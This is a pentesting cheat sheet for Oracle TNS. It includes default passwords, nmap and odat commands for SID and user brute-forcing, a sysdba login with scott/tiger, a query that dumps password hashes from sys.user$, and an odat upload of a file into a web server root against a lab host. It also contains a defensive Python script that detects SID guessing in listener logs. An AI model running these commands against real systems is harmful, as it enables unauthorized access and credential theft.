# Oracle TNS

The TNS listener is configured to support various network protocols, including `TCP/IP`, `UDP`, `IPX/SPX`, and `AppleTalk`.

The configuration files for Oracle TNS are called `tnsnames.ora` and `listener.ora` and are typically located in the `$ORACLE_HOME/network/admin` directory.

Oracle 9 has a default password, `CHANGE_ON_INSTALL`, whereas Oracle 10 has no default password set.

The Oracle DBSNMP service also uses a default password, `dbsnmp`.

Each database or service has a unique entry in the [tnsnames.ora](https://docs.oracle.com/cd/E11882_01/network.112/e10835/tnsnames.htm#NETRF007) file.

In Oracle RDBMS, a System Identifier (`SID`) is a unique name that identifies a particular database instance.

The SID is an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to.

There are various ways to enumerate, or better said, guess SIDs. For this we can use tools like `nmap`, `hydra`, `odat`, and others.
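On the defender's side, SID guessing is visible in the listener's `listener.log`: every connect attempt for an unknown SID is recorded with return code `12505`. The following is an added example, not part of the original notes, that flags sources requesting several distinct unknown SIDs. The log lines are constructed samples in the standard listener log layout, and the function name and the threshold of 3 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the listener.log layout:
# TIMESTAMP * CONNECT_DATA * ADDRESS * EVENT * SID * RETURN_CODE
SAMPLE_LOG = """\
12-MAR-2024 10:15:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.50)(PORT=40112)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 10:15:01 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.50)(PORT=40114)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 10:15:02 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.50)(PORT=40116)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 10:15:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.50)(PORT=40118)) * establish * XE * 0
12-MAR-2024 11:40:27 * (CONNECT_DATA=(CID=(PROGRAM=sqlplus)(HOST=ws01)(USER=alice))(SID=XEE)) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=51877)) * establish * XEE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
"""

# SID from CONNECT_DATA, peer IP from the ADDRESS block (not the client-supplied
# CID HOST, which is attacker-controlled), and the trailing return code.
LINE_RE = re.compile(
    r"\(CONNECT_DATA=.*?\(SID=(?P<sid>[^)]*)\).*?"
    r"\(ADDRESS=.*?\(HOST=(?P<src>[^)]+)\).*?"
    r"\* establish \* \S+ \* (?P<rc>\d+)\s*$"
)

def sid_guessing_sources(log_text, min_distinct_sids=3):
    """Return {source: sorted unknown SIDs} for sources at or over the threshold.

    min_distinct_sids is an assumed threshold; tune it so that a single
    mistyped SID from a workstation does not raise an alert.
    """
    failed = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        # 12505 = listener does not know the SID given in the connect descriptor
        if m and m.group("rc") == "12505":
            failed[m.group("src")].add(m.group("sid").upper())
    return {src: sorted(sids) for src, sids in failed.items()
            if len(sids) >= min_distinct_sids}

if __name__ == "__main__":
    for src, sids in sid_guessing_sources(SAMPLE_LOG).items():
        print(f"possible SID guessing from {src}: {', '.join(sids)}")
```
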

## Tools

```bash
./odat.py -h
```

If not installed, see [pentesting-machine](https://docs.rtlcopymemory.com/pentesting-machine "mention")

## **Nmap - SID Bruteforcing**

```bash
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
```

## ODAT - More information, user bruteforcing included

```shell-session
./odat.py all -s 10.129.204.235
```

## **SQLplus - Log In**

```shell-session
sqlplus <username>/<password>@<IP>/<SID>
```

{% hint style="info" %}
In case of error `sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory` execute: `sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig`
{% endhint %}

[SQLplus commands](https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985):

```shell-session
select table_name from all_tables;
```

```shell-session
select * from user_role_privs;
```

## Database Enumeration

It is possible to try known credentials to log in as the System Database Admin (`sysdba`):

```shell-session
sqlplus scott/tiger@10.129.204.235/XE as sysdba
```

Then list the current user's privileges:

```shell-session
select * from user_role_privs;
```

From this point, we could retrieve the password hashes from the `sys.user$` table and try to crack them offline:

```shell-session
select name, password from sys.user$;
```

## **Oracle RDBMS - File Upload**

```bash
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
```

```bash
curl -X GET http://10.129.204.235/testing.txt
```
